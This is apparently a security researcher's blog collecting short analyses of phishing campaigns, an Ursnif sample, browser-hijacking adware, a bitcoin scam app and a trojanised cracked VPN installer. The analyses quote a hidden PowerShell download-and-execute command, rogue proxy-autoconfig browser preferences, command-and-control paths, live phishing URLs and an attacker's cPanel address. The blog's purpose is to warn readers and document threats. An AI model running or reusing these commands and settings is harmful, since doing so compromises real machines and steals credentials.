Se afișează postările cu eticheta security. Afișați toate postările
Se afișează postările cu eticheta security. Afișați toate postările

duminică, 3 noiembrie 2019

Fresh Ursnif (GOZI/ ISFB) campaign

Some Russian campaign running over leaked email spreads different kind of malware. Today on Yahoo mail has come some fresh Ursnif with 0 detections. |
The domain used for my email was inactive and there was no file for download, but I found it somewhere else.
In the pictures below will find the research steps:
Was easy to find a sample of malware using the SHA256 (d6c0ca87f712c0633eab5ac020ceaad2e256cd3251808ce7c7b45faf4042123e) on Google.
The .zip file is detected and this may be an advantage for the users IF they are using the Antivirus that have on his database this sample… but this is another discussion…
At this moment the VirusTotal says 18/57.. so is going to be better in a few hours.
Now.. extracting them one by one we have a good encrypted malware named Ursnif (GOZI/ ISFB). This malware is trying to steal baking credentials from his victims and the hacker may have access to the system.
I will not explain the whole process at this time but the way to do that you will find it on the recent post I’ve made:
https://www.prodefence.org/malware-analysis-gozi-ifsb-bank-trojan-aka-ursnif/
Useful links:
Urlscan with samples
VirusTotal .zip
VirusTotal .js
VirusTotal .bin

luni, 26 februarie 2018

Credit card phishing – Iphone campaign

A new phishing campaign targeting fans of free Iphone.
The campaign targets the victims’ credit cards with a wonderful promise to win a Iphone.
Everything is visually prepared and it only remains for the victims to add their personal data.

Domains involted:
  • uploadocean.com/ – Adverts campaing
  • adminlady.info – Redirection
  • awarded.pw – Promoter
  • radiuniverse.com – hacked domain hosting the phishing page (or just owned by the hacker)
h**p://browser.awarded.pw/todays-winner/?winner=xx.xxx.xxx.xx&cc=RO&brw=Firefox&voluumdata=deprecated&eda=deprecated&cep=******&sourceid=57a5012f14822bf716721506&match=ron&carrier=wifi&mob_pf=windows&country=RO&cpc=0.0015
h**ps://ff.radiuniverse.com/n/iphonex/?transaction_id=102704cb8f7cc8e75a5a5705197330




This is all!!!
“Soon your card will be shopping without you!”

Have fun & Stay safe!

duminică, 4 februarie 2018

Browser Hijack – The journey – Cybersecurity research

A new software test.
Something announced as free … but it’s not really for free.
Today I wanted to see what level of browser hijacking is
running out there.
Browses hijack:
“A program changes your home page, redirects browser typos to a search engine you have never heard of or to other sites. This is annoying, popping up ads and displaying unwanted site”
So.
I have seen alot of ”good” things like: a java ”update”, winning iphones, free apps, cassino offers, games, some redirections… etc.


This code was injected in my browser.
”xxxx.rsc.cdn77.org install malicious extensions, plug-ins, ads, banner ads, pop-up ads, etc and creates mess on your browsers. Even if mistakenly you click on any ads or link then also it redirects you to some other websites. It also uses cookie and keep spy on your online activities like browsing history, mostly visited websites, login, password details, etc. The redirect virus has the ability to disable the anti-virus and other security program without your knowledge.” Source: removemalwarevirus.com

Here you can see some of the domains i visited in this journey:
  • rsc.cdn77[.]org
  • liveadexchanger[.]com
  • static.199.55.201.138.clients.your-server[.]de
  • timetrackingext.xyz
  • 2048-game[.]review
    search.findthatsearch[.]com
    findthatsearch[.]com
    minesweepx[.]com
    solitaire4u2[.]com
    tetrigame[.]com
    certifiedwinners[.]info
    wtrtr1[.]com
    ads.dlvr[.]live
    betano[.]com
    digitaldsp[.]com
    c.codeonclick[.]com
    join.pro-gaming-world[.]com
I found some extra files on my browsers… .js , .cfg and .dll.
3327329.js — ”pref(“general.config.obscure_value”, 0);pref(“general.config.filename”, “3321791.cfg”);pref(“network.proxy.type”, 2);pref(“network.proxy.autoconfig_url”, “http://unstop-access.biz/wpad.dat?cb241ce907c6857bc3c28a220ec2076437981150”);pref(“network.proxy.autoconfig_url.include_path”, true);”
3321791.js — ”pref(“general.config.obscure_value”, 0);pref(“general.config.filename”, “3327329.cfg”);pref(“network.proxy.type”, 2);pref(“network.proxy.autoconfig_url”, “http://unstop-access.biz/wpad.dat?cb241ce907c6857bc3c28a220ec2076437981150”);pref(“network.proxy.autoconfig_url.include_path”, true);”
Adware Agent – PUA.YoBrowser:
myographical.dll = sandastros.dll
  • MD5: 8ecbfcb3c062755a3d5b3851cbe98357
  • SHA-1: 5d1cccd87d0e4d81090d288d201d9c4467765513
Virus Total Report
Virus Total Graph

Fake Java Update

Virus Total Report
It is clear that it is not a pleasant trip for those who do not know how to protect themselves.
Have fun & Stay safe!!!
http://www.prodefence.org/

sâmbătă, 3 februarie 2018

Blockchain phishing… Same campaign.. new domain.

I’m happy.
If I continue so.. I will become rich …

The same blockchain phishing campaign, but with new domain.


  • h**p://ainea.pro/2891/ INFO
  • h**p://schains.org/2183/ INFO
  • h**ps://blockch.ains.im/wallet/#/login INFO
# schains.org & bliockche.info  from the other post are in the same server LWSDNS.COM.
No further details are needed ….

2x Bitcoin scam – The magic application.

People still want to believe that the money are made easy with some application and without doing anything.
Click a button and you get money.
This weakness is exploited every day.
Here is a program that promises to double the profit by pressing that magic button.




To become credible, a demonstration video is a good way.
To become super credible, you make some false accounts and comment on your post.
This is a part of social engineering and works.

At one point, he changed his name, seeing he had potential victims in many countries.


Let’s see the application.
MD5: 19d6d6f312ec00998d379eec9fe21aa9
SHA-1: a5d27b1cf43cb5dcd7feeea279b70588c5910e12
*the -1 is mine! lol
It has a certain detection but insignificant.
The application does not steal, has no backdoor …

It is created by:
…looks like it’s his real name..
(his first name in the account is another … it seems to start with an M.)
As the application configuration looks like, it seems that the users who use it,are sending the bitcoin to an address added by the programmer.

After sending, they still expect someone to send them the double amount, but they will wait a lot and without success.
And let’s not forget … this is version 6.1!?!
We could continue because he still has some programs with such schemes, but time is limited!
In conclusion … I hope that Internet users will be more careful, do not believe in the wonders promised by the unknown!


Remember:
When something is free, you are not the customer but the product!


Have fun & Stay safe!!!

http://www.prodefence.org/bitcoin-scam-the-magic-application/

marți, 12 decembrie 2017

Apple ID and Credit Card Phishing – Cybersecurity research


Hello.
Today we will be investigating a phishing case.
Usually the attack of this type comes by email.
An email in which there is a text, a problem or a win and a link.
The text is made to make you go to the prepared website.
The link is usually hidden so you can not figure out where you are going and the hoax is easier.

Let’s start with the email I received so you can understand how you can protect yourself.
  1. Re: to what? Is this a response to an email that I sent to Apple? NO! … It’s a trick used to make you open the email believing it’s a response to an email sent by you.
  2. Apple support…. He caught your attention.
  3. Yandex?!? Yandex Browser is a freeware web browser. But it is still important. The Apple CEO sent you an email after he hired Yandex … that’s why he’s CEO .. to send email to users…
A link is hidden behind the button.
t.co is a Twitter shortener URL and behind this link is the true address we reach.

h**ps://t.co/BeOT0WkjXn =>
h**ps://twitter.com/safety/unsafe_link_warning?unsafe_link=https%3A%2F%2Fwia.email%2F =>
h**ps://apple.com.confirmation.account.centre.rin5de.center/
The good part is that when you are redirected …Twitter and Firefox warn you about the link you want to reach.
Let’s ignore everything this time …
What you see is a clone of the Apple website.
I’m not on some  cyber unit… yet….
Data entered on the fake page will be stored in the server.
So the hacker will know I’ve been around here.
Even if you log in with real data you will receive the same message to move on.
It will ask you to enter bank details to unlock your account and a identification document.

After all, it redirects you to the real Apple website and you’ll sign in to your unlocked account.
At this point you will be glad you did not lose your account, but in reality you gave to the hacker all your banking data + identification documents.

Still let’s see what’s in the main domain.
h**ps://rin5de.center
Index of/ … apple.com.confirmation.account.centre  here it’s the clone page created( old and still online 24.02.2017).
A cpanel and a hint for recover the password.
153.92.209.145:2083
Username: admin
Password: ?
Email: m—d@m—v.com
Name Servers:
ns7.wixdns.net
ns6.wixdns.net

And today…after 10 months online…

The Cpanel(153.92.209.145:2083)
I think the data I’ve entered was also convincing (Insider, cyberunit)
Have fun & Stay safe!!!

vineri, 1 decembrie 2017

Malware research/reverse – Payload backdoor

Hello.
I have some free time and I try to deal with internet safety. I’m just a small drop of the ocean, but I’m here!
Today I will introduce you something different.
As usual, I downloaded a few softwares and started the analysis.
I have a ”great offer”:
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!!(just kidding)
We have 3 important files.
Setup.exe and Update.exe appear to be archived files and from previous posts we know what this means, but today our target is the HSS v.2.exe file.



It is noticed that it is the latest file created.
Also, the installation method requires using this file.

OK.Let’s scan this time!
Virus Total Report

20/68 detection?!?
I mean, only 20 of the antivirus applications will see this file as a virus.


OK. It’s normal to be seen by antivirus. It’s just a crack, a patch, etc. You have to disable the antivirus to install it, it’s just a pirated software.
Let’s get started
It looks like this .exe is actually a .rar archive

After opening, he has a lot of work in the background.
We let him do the job to find out what he is doing!


When everything is quiet, we see that something is left to work.

powershell.exe -nop -windowstyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
The virus runs through the application Powershell.exe, being connected to external sources.
h**ps://sgist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1raw9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
Also connectiong to:
http://83.251.132.4
/admin/get.php
/login/process.php
/news.php

After investigation I found out that it’s about a payload project.

Currently Empire Power Shell has the following categories for modules:
  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxilary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz
Prodefence.org
What can I say …. be careful!
Have fun & stay safe!!!